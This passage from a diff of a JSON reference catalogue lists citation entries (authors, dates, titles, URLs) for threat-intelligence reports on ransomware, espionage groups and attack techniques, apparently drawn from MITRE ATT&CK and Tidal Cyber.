"https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html" + ], + "source": "MITRE", + "title": "Threat Advisory: CaddyWiper" + }, + "related": [], + "uuid": "88fc1f96-2d55-4c92-a929-234248490c30", + "value": "Cisco CaddyWiper March 2022" + }, + { + "description": "Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2016-04-28T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/" + ], + "source": "MITRE", + "title": "Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”" + }, + "related": [], + "uuid": "b23fc191-cc84-49c8-9eb0-09db7e23b24d", + "value": "Carbon Black Squiblydoo Apr 2016" + }, + { + "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "date_published": "2020-07-15T00:00:00Z", + "refs": [ + "https://blog.aquasec.com/malicious-container-image-docker-container-host" + ], + "source": "MITRE", + "title": "Threat Alert: Attackers Building Malicious Images on Your Hosts" + }, + "related": [], + "uuid": "efd64f41-13cc-4b2b-864c-4d2352cdadcd", + "value": "Aqua Build Images on Hosts" + }, + { + "description": "Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2020-04-03T00:00:00Z", + "refs": [ + "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" + ], + "source": "MITRE", + "title": "Threat Alert: Kinsing Malware Attacks Targeting Container Environments" + }, + "related": [], + "uuid": "67dd04dd-c0e0-49e6-9341-4e445d660641", + "value": "Aqua Kinsing April 2020" + }, + { + "description": "Elsad, A. (2022, August 25). Threat Assessment: Black Basta Ransomware. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2022-08-25T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware" + ], + "source": "MITRE", + "title": "Threat Assessment: Black Basta Ransomware" + }, + "related": [], + "uuid": "fc9ee531-3680-549b-86e0-a10a70c3ec67", + "value": "Palo Alto Networks Black Basta August 2022" + }, + { + "description": "Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021.", + "meta": { + "date_accessed": "2021-07-30T00:00:00Z", + "date_published": "2021-04-13T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/clop-ransomware/" + ], + "source": "MITRE", + "title": "Threat Assessment: Clop Ransomware" + }, + "related": [], + "uuid": "ce48d631-757c-480b-8572-b7d9f4d738c6", + "value": "Unit42 Clop April 2021" + }, + { + "description": "Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.", + "meta": { + "date_accessed": "2021-02-09T00:00:00Z", + "date_published": "2020-06-26T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/" + ], + "source": "MITRE", + "title": "Threat Assessment: EKANS Ransomware" + }, + "related": [], + "uuid": "dcdd4e48-3c3d-4008-a6f6-390f896f147b", + "value": "Palo Alto Unit 42 EKANS" + }, + { + "description": "UNIT 42. (2022, March 24). Threat Brief: Lapsus$ Group. Retrieved May 17, 2022.", + "meta": { + "date_accessed": "2022-05-17T00:00:00Z", + "date_published": "2022-03-24T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/lapsus-group/" + ], + "source": "MITRE", + "title": "Threat Brief: Lapsus$ Group" + }, + "related": [], + "uuid": "50f4c1ed-b046-405a-963d-a113324355a3", + "value": "UNIT 42 LAPSUS Mar 2022" + }, + { + "description": "Falcone, R. et al.. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022.", + "meta": { + "date_accessed": "2022-03-10T00:00:00Z", + "date_published": "2022-01-20T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/#whispergate-malware-family" + ], + "source": "MITRE", + "title": "Threat Brief: Ongoing Russia and Ukraine Cyber Conflict" + }, + "related": [], + "uuid": "3daa8c9e-da17-4eda-aa0d-df97c5de8f64", + "value": "Unit 42 WhisperGate January 2022" + }, + { + "description": "Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.", + "meta": { + "date_accessed": "2019-02-19T00:00:00Z", + "date_published": "2019-02-07T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/" + ], + "source": "MITRE", + "title": "Threat Brief: Understanding Domain Generation Algorithms (DGA)" + }, + "related": [], + "uuid": "5e1db76a-0a3e-42ce-a66c-f914fb1a3471", + "value": "Unit 42 DGA Feb 2019" + }, + { + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "meta": { + "date_accessed": "2018-08-18T00:00:00Z", + "date_published": "2015-08-05T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + ], + "source": "MITRE, Tidal Cyber", + "title": "Threat Group-3390 Targets Organizations for Cyberespionage" + }, + "related": [], + "uuid": "dfd2d832-a6c5-40e7-a554-5a92f05bebae", + "value": "Dell TG-3390" + }, + { + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-06-16T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign" + ], + "source": "MITRE", + "title": "Threat Group-4127 Targets Hillary Clinton Presidential Campaign" + }, + "related": [], + "uuid": "5f401c82-4e16-43a1-b234-48918fe7df9f", + "value": "SecureWorks TG-4127" + }, + { + "description": "Sherstobitoff, R., Rea, M. (2017, November 7). Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-11-07T00:00:00Z", + "refs": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/" + ], + "source": "MITRE", + "title": "Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack" + }, + "related": [], + "uuid": "8670f4ee-7491-4c37-9832-99d6f8f54ba8", + "value": "McAfee APT28 DDE1 Nov 2017" + }, + { + "description": "Gahlot, A. (n.d.). Threat Hunting for Avaddon Ransomware. Retrieved August 19, 2021.", + "meta": { + "date_accessed": "2021-08-19T00:00:00Z", + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/" + ], + "source": "MITRE", + "title": "Threat Hunting for Avaddon Ransomware" + }, + "related": [], + "uuid": "c113cde7-5dd5-45e9-af16-3ab6ed0b1728", + "value": "Awake Security Avaddon" + }, + { + "description": "Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" + ], + "source": "MITRE", + "title": "Threat Hunting Series: Detecting Command & Control in the Cloud" + }, + "related": [], + "uuid": "fa3762ce-3e60-4991-b464-12601d2a6912", + "value": "Awake Security C2 Cloud" + }, + { + "description": "Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.", + "meta": { + "date_accessed": "2022-07-08T00:00:00Z", + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" + ], + "source": "MITRE", + "title": "Threat Hunting Series: Detecting Command & Control in the Cloud" + }, + "related": [], + "uuid": "b12e0288-48cd-46ec-8305-0f4d050782f2", + "value": "Detecting Command & Control in the Cloud" + }, + { + "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "date_published": "2020-04-02T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" + ], + "source": "MITRE", + "title": "Threat Matrix for Kubernetes" + }, + "related": [], + "uuid": "43fab719-e348-4902-8df3-8807765b95f0", + "value": "Threat Matrix for Kubernetes" + }, + { + "description": "SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" + ], + "source": "MITRE", + "title": "Threat Profile - BRONZE MOHAWK" + }, + "related": [], + "uuid": "b741fe9a-4b08-44b9-b6e7-5988eee486a3", + "value": "SecureWorks BRONZE MOHAWK n.d." + }, + { + "description": "ESET. (2022, February). THREAT REPORT T3 2021. Retrieved February 10, 2022.", + "meta": { + "date_accessed": "2022-02-10T00:00:00Z", + "date_published": "2022-02-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf" + ], + "source": "MITRE", + "title": "THREAT REPORT T3 2021" + }, + "related": [], + "uuid": "34a23b22-2d39-47cc-a1e9-47f7f490dcbd", + "value": "ESET T3 Threat Report 2021" + }, + { + "description": "Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.", + "meta": { + "date_accessed": "2022-07-14T00:00:00Z", + "date_published": "2020-01-08T00:00:00Z", + "refs": [ + "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot" + ], + "source": "MITRE", + "title": "Threat Spotlight: Amadey Bot Targets Non-Russian Users" + }, + "related": [], + "uuid": "21b7a7c7-55a2-4235-ba11-d34ba68d1bf5", + "value": "BlackBerry Amadey 2020" + }, + { + "description": "Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2015-03-03T00:00:00Z", + "refs": [ + "https://blogs.cisco.com/security/talos/angler-domain-shadowing" + ], + "source": "MITRE", + "title": "Threat Spotlight: Angler Lurking in the Domain Shadows" + }, + "related": [], + "uuid": "0b10d7d4-9c18-4fd8-933a-b46e41d618ab", + "value": "CiscoAngler" + }, + { + "description": "Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2022-11-09T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/ipfs-abuse/" + ], + "source": "MITRE", + "title": "Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns" + }, + "related": [], + "uuid": "dc98c7ce-0a3f-5f35-9885-6c1c73e5858d", + "value": "Talos IPFS 2022" + }, + { + "description": "Esler, J., Lee, M., and Williams, C. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2014-10-14T00:00:00Z", + "refs": [ + "http://blogs.cisco.com/security/talos/threat-spotlight-group-72" + ], + "source": "MITRE", + "title": "Threat Spotlight: Group 72" + }, + "related": [], + "uuid": "b9201737-ef72-46d4-8e86-89fee5b98aa8", + "value": "Cisco Group 72" + }, + { + "description": "Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.", + "meta": { + "date_accessed": "2019-09-24T00:00:00Z", + "date_published": "2014-10-28T00:00:00Z", + "refs": [ + "https://blogs.cisco.com/security/talos/opening-zxshell" + ], + "source": "MITRE", + "title": "Threat Spotlight: Group 72, Opening the ZxShell" + }, + "related": [], + "uuid": "41c20013-71b3-4957-98f0-fb919014c93e", + "value": "Talos ZxShell Oct 2014" + }, + { + "description": "Infinitum IT. (n.d.). Threat Spotlight: Lockbit Black 3.0 Ransomware. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://raw.githubusercontent.com/whichbuffer/Lockbit-Black-3.0/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf" + ], + "source": "Tidal Cyber", + "title": "Threat Spotlight: Lockbit Black 3.0 Ransomware" + }, + "related": [], + "uuid": "8bee2689-dfd8-45b2-b8dd-e87ab3ade0ec", + "value": "Infinitum IT LockBit 3.0" + }, + { + "description": "The BlackBerry Research & Intelligence Team. (2021, June 10). Threat Thursday: SystemBC – a RAT in the Pipeline. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "date_published": "2021-06-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://blogs.blackberry.com/en/2021/06/threat-thursday-systembc-a-rat-in-the-pipeline" + ], + "source": "Tidal Cyber", + "title": "Threat Thursday: SystemBC – a RAT in the Pipeline" + }, + "related": [], + "uuid": "08186ff9-6ca5-4c09-b5e7-b883eb15fdba", + "value": "BlackBerry SystemBC June 10 2021" + }, + { + "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021.", + "meta": { + "date_accessed": "2021-06-09T00:00:00Z", + "date_published": "2021-02-17T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and" + ], + "source": "MITRE", + "title": "Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe" + }, + "related": [], + "uuid": "d702653f-a9da-4a36-8f84-97caeb445266", + "value": "DOJ North Korea Indictment Feb 2021" + }, + { + "description": "Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018.", + "meta": { + "date_accessed": "2018-07-10T00:00:00Z", + "date_published": "2018-06-19T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ], + "source": "MITRE, Tidal Cyber", + "title": "Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies" + }, + "related": [], + "uuid": "482a6946-b663-4789-a31f-83fb2132118d", + "value": "Symantec Thrip June 2018" + }, + { + "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.", + "meta": { + "date_accessed": "2016-05-13T00:00:00Z", + "date_published": "2015-12-07T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html" + ], + "source": "MITRE", + "title": "Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record" + }, + "related": [], + "uuid": "585827a8-1f03-439d-b66e-ad5290117c1b", + "value": "FireEye Bootkits" + }, + { + "description": "Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.", + "meta": { + "date_accessed": "2022-03-17T00:00:00Z", + "date_published": "2020-03-11T00:00:00Z", + "refs": [ + "https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512" + ], + "source": "MITRE", + "title": "Through the Looking Glass — Part 1" + }, + "related": [], + "uuid": "6ab2cfa1-230f-498e-8049-fcdd2f7296dd", + "value": "SpecterOps AWS Traffic Mirroring" + }, + { + "description": "Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018.", + "meta": { + "date_accessed": "2018-03-30T00:00:00Z", + "date_published": "2011-02-17T00:00:00Z", + "refs": [ + "https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html" + ], + "source": "MITRE", + "title": "Throwing Star LAN Tap" + }, + "related": [], + "uuid": "1be27354-1326-4568-b26a-d0034acecba2", + "value": "Ossmann Star Feb 2011" + }, + { + "description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.", + "meta": { + "date_accessed": "2018-07-16T00:00:00Z", + "date_published": "2016-04-28T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan" + ], + "source": "MITRE", + "title": "Tick cyberespionage group zeros in on Japan" + }, + "related": [], + "uuid": "3e29cacc-2c05-4f35-8dd1-948f8aee6713", + "value": "Symantec Tick Apr 2016" + }, + { + "description": "TightVNC Software. (n.d.). TightVNC Software. Retrieved July 10, 2023.", + "meta": { + "date_accessed": "2023-07-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.tightvnc.com/" + ], + "source": "Tidal Cyber", + "title": "TightVNC Software" + }, + "related": [], + "uuid": "e1725230-4f6c-47c5-8e30-90dfb01a75d7", + "value": "TightVNC Software Project Page" + }, + { + "description": "Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.", + "meta": { + "date_accessed": "2021-04-22T00:00:00Z", + "date_published": "2020-09-17T00:00:00Z", + "refs": [ + "https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/" + ], + "source": "MITRE", + "title": "Time Bombs: Malware With Delayed Execution" + }, + "related": [], + "uuid": "cd369bf9-80a8-426f-a0aa-c9745b40696c", + "value": "AnyRun TimeBomb" + }, + { + "description": "Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.", + "meta": { + "date_accessed": "2018-03-26T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx" + ], + "source": "MITRE", + "title": "Time Provider" + }, + "related": [], + "uuid": "cf7c1db8-6282-4ccd-9609-5a012faf70d6", + "value": "Microsoft TimeProvider" + }, + { + "description": "Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.", + "meta": { + "date_accessed": "2021-12-02T00:00:00Z", + "date_published": "2021-09-21T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2021/09/tinyturla.html" + ], + "source": "MITRE", + "title": "TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines" + }, + "related": [], + "uuid": "94cdbd73-a31a-4ec3-aa36-de3ea077c1c7", + "value": "Talos TinyTurla September 2021" + }, + { + "description": "netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.", + "meta": { + "date_accessed": "2017-04-21T00:00:00Z", + "date_published": "2017-04-03T00:00:00Z", + "refs": [ + "https://pentestlab.blog/2017/04/03/token-manipulation/" + ], + "source": "MITRE", + "title": "Token Manipulation" + }, + "related": [], + "uuid": "243deb44-4d47-4c41-bd5d-262c4319cce5", + "value": "Pentestlab Token Manipulation" + }, + { + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "meta": { + "date_accessed": "2020-12-07T00:00:00Z", + "date_published": "2013-11-01T00:00:00Z", + "refs": [ + "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + ], + "source": "MITRE", + "title": "To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve" + }, + "related": [], + "uuid": "76b99581-e94d-4e51-8110-80557474048e", + "value": "Langer Stuxnet" + }, + { + "description": "Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.", + "meta": { + "date_accessed": "2021-10-17T00:00:00Z", + "date_published": "2020-10-02T00:00:00Z", + "refs": [ + "https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf" + ], + "source": "MITRE", + "title": "Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure" + }, + "related": [], + "uuid": "140e6b01-6b98-4f82-9455-0c84b3856b86", + "value": "TrendMicro Tonto Team October 2020" + }, + { + "description": "Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.", + "meta": { + "date_accessed": "2016-08-18T00:00:00Z", + "date_published": "2015-05-01T00:00:00Z", + "refs": [ + "https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html" + ], + "source": "MITRE", + "title": "Tools used by the Uroburos actors" + }, + "related": [], + "uuid": "99e2709e-a32a-4fbf-a20a-ffcdd8befdc8", + "value": "NorthSec 2015 GData Uroburos Tools" + }, + { + "description": "Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2004-01-01T00:00:00Z", + "refs": [ + "http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf" + ], + "source": "MITRE", + "title": "Tor: The Second-Generation Onion Router" + }, + "related": [], + "uuid": "ffb6a26d-2da9-4cce-bb2d-5280e9cc16b4", + "value": "Dingledine Tor The Second-Generation Onion Router" + }, + { + "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.", + "meta": { + "date_accessed": "2017-07-18T00:00:00Z", + "date_published": "2017-05-03T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + ], + "source": "MITRE", + "title": "To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence" + }, + "related": [], + "uuid": "25d8bac0-9187-45db-ad96-c7bce20cef00", + "value": "FireEye FIN7 Shim Databases" + }, + { + "description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/" + ], + "source": "MITRE", + "title": "Tracker.exe" + }, + "related": [], + "uuid": "f0e368f1-3347-41ef-91fb-995c3cb07707", + "value": "LOLBAS Tracker" + }, + { + "description": "BushidoToken. (2023, August 16). Tracking Adversaries: Scattered Spider, the BlackCat affiliate. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "date_published": "2023-08-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://blog.bushidotoken.net/2023/08/tracking-adversaries-scattered-spider.html" + ], + "source": "Tidal Cyber", + "title": "Tracking Adversaries: Scattered Spider, the BlackCat affiliate" + }, + "related": [], + "uuid": "621a8320-0e3c-444f-b82a-7fd4fdf9fb67", + "value": "BushidoToken Scattered Spider August 16 2023" + }, + { + "description": "Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.", + "meta": { + "date_accessed": "2016-02-01T00:00:00Z", + "date_published": "2015-11-26T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts" + ], + "source": "MITRE", + "title": "Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts" + }, + "related": [], + "uuid": "5d5ca6a4-5e2f-4679-9040-b68d524778ff", + "value": "Lateral Movement Payne" + }, + { + "description": "Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus’ new Downloader, KerrDown. Retrieved October 1, 2021.", + "meta": { + "date_accessed": "2021-10-01T00:00:00Z", + "date_published": "2019-02-01T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/" + ], + "source": "MITRE", + "title": "Tracking OceanLotus’ new Downloader, KerrDown" + }, + "related": [], + "uuid": "bff5dbfe-d080-46c1-82b7-272e03d2aa8c", + "value": "Unit 42 KerrDown February 2019" + }, + { + "description": "Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf" + ], + "source": "MITRE", + "title": "Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group" + }, + "related": [], + "uuid": "d6b52135-6bb2-4e37-8f94-1e1d6354bdfd", + "value": "Trend Micro TeamTNT" + }, + { + "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "date_published": "2018-08-01T00:00:00Z", + "refs": [ + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf" + ], + "source": "MITRE", + "title": "TRAILS OF WINDSHIFT" + }, + "related": [], + "uuid": "97eac0f2-d528-4f7c-8425-7531eae4fc39", + "value": "SANS Windshift August 2018" + }, + { + "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx" + ], + "source": "MITRE", + "title": "Transactional NTFS (TxF)" + }, + "related": [], + "uuid": "f7f2eecc-19e6-4d93-8a53-91afea2f242e", + "value": "Microsoft TxF" + }, + { + "description": "Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.", + "meta": { + "date_accessed": "2022-07-14T00:00:00Z", + "date_published": "2021-05-04T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/rclone-mega-extortion/" + ], + "source": "MITRE", + "title": "Transferring leverage in a ransomware attack" + }, + "related": [], + "uuid": "9b492a2f-1326-4733-9c0e-a9454bf7fabb", + "value": "Rclone-mega-extortion_05_2021" + }, + { + "description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/win32/com/translating-to-jscript" + ], + "source": "MITRE", + "title": "Translating to JScript" + }, + "related": [], + "uuid": "99e48516-f918-477c-b85e-4ad894cc031f", + "value": "JScrip May 2018" + }, + { + "description": "Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022.", + "meta": { + "date_accessed": "2022-07-29T00:00:00Z", + "date_published": "2021-05-13T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html" + ], + "source": "MITRE", + "title": "Transparent Tribe APT expands its Windows malware arsenal" + }, + "related": [], + "uuid": "be1e3092-1981-457b-ae76-b55b057e1d73", + "value": "tt_obliqueRAT" + }, + { + "description": "Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.", + "meta": { + "date_accessed": "2021-09-02T00:00:00Z", + "date_published": "2021-05-13T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Transparent Tribe APT expands its Windows malware arsenal" + }, + "related": [], + "uuid": "5d58c285-bc7d-4a8a-a96a-ac7118c1089d", + "value": "Talos Transparent Tribe May 2021" + }, + { + "description": "N. Baisini. (2022, July 13). Transparent Tribe begins targeting education sector in latest campaign. Retrieved September 22, 2022.", + "meta": { + "date_accessed": "2022-09-22T00:00:00Z", + "date_published": "2022-07-13T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html" + ], + "source": "MITRE", + "title": "Transparent Tribe begins targeting education sector in latest campaign" + }, + "related": [], + "uuid": "acb10fb6-608f-44d3-9faf-7e577b0e2786", + "value": "Cisco Talos Transparent Tribe Education Campaign July 2022" + }, + { + "description": "Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.", + "meta": { + "date_accessed": "2022-09-06T00:00:00Z", + "date_published": "2022-03-29T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html" + ], + "source": "MITRE", + "title": "Transparent Tribe campaign uses new bespoke malware to target Indian government officials" + }, + "related": [], + "uuid": "9bdda422-dbf7-4b70-a7b1-9e3ad658c239", + "value": "tt_httrack_fake_domains" + }, + { + "description": "Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved April 1, 2021.", + "meta": { + "date_accessed": "2021-04-01T00:00:00Z", + "date_published": "2020-08-20T00:00:00Z", + "refs": [ + "https://securelist.com/transparent-tribe-part-1/98127/" + ], + "source": "MITRE", + "title": "Transparent Tribe: Evolution analysis, part 1" + }, + "related": [], + "uuid": "0db470b1-ab22-4b67-a858-472e4de7c6f0", + "value": "Securelist Trasparent Tribe 2020" + }, + { + "description": "Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021.", + "meta": { + "date_accessed": "2021-09-02T00:00:00Z", + "date_published": "2020-08-20T00:00:00Z", + "refs": [ + "https://securelist.com/transparent-tribe-part-1/98127/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Transparent Tribe: Evolution analysis, part 1" + }, + 